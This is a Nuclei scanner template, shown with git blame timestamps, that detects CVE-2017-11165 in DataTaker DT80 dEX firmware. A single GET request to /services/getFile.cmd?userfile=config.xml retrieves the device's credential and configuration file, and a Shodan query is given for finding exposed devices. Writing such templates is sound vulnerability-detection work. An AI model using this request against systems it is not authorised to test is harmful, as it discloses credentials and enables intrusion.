nuclei-templates/http/cves/2017/CVE-2017-11165.yaml

52 lines
1.6 KiB
YAML
Raw Normal View History

2023-01-15 12:41:22 +00:00
id: CVE-2017-11165
info:
name: DataTaker DT80 dEX 1.50.012 - Information Disclosure
2023-01-15 12:41:22 +00:00
author: theabhinavgaur
severity: critical
description: |
DataTaker DT80 dEX 1.50.012 is susceptible to information disclosure. A remote attacker can obtain sensitive credential and configuration information via a direct request for the /services/getFile.cmd?userfile=config.xml URI, thereby possibly accessing sensitive information, modifying data, and/or executing unauthorized operations.
2023-01-15 12:41:22 +00:00
reference:
- https://www.exploit-db.com/exploits/45094
- https://packetstormsecurity.com/files/143328/DataTaker-DT80-dEX-1.50.012-Sensitive-Configuration-Exposure.html
- https://www.exploit-db.com/exploits/42313/
- https://nvd.nist.gov/vuln/detail/CVE-2017-11165
2023-01-15 12:41:22 +00:00
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
2023-01-15 20:02:03 +00:00
cve-id: CVE-2017-11165
cwe-id: CWE-200
2023-07-11 19:49:27 +00:00
epss-score: 0.94336
cpe: cpe:2.3:o:datataker:dt80_dex_firmware:1.50.012:*:*:*:*:*:*:*
2023-08-31 11:46:18 +00:00
epss-percentile: 0.98871
2023-01-15 20:02:03 +00:00
metadata:
max-request: 1
2023-01-15 20:02:03 +00:00
shodan-query: http.title:"datataker"
2023-06-04 08:13:42 +00:00
verified: true
2023-07-11 19:49:27 +00:00
vendor: datataker
product: dt80_dex_firmware
tags: lfr,edb,cve,cve2017,datataker,config,packetstorm,exposure
2023-01-15 12:41:22 +00:00
http:
2023-01-15 12:41:22 +00:00
- method: GET
path:
2023-01-15 20:02:03 +00:00
- "{{BaseURL}}/services/getFile.cmd?userfile=config.xml"
2023-01-15 12:41:22 +00:00
matchers-condition: and
matchers:
- type: word
words:
2023-01-15 20:02:03 +00:00
- "COMMAND_SERVER"
- "<loggerSettings>"
- "config id=\"config"
2023-01-15 12:41:22 +00:00
condition: and
2023-01-15 20:02:03 +00:00
- type: word
part: header
words:
- "text/xml"
2023-01-15 12:41:22 +00:00
- type: status
status:
- 200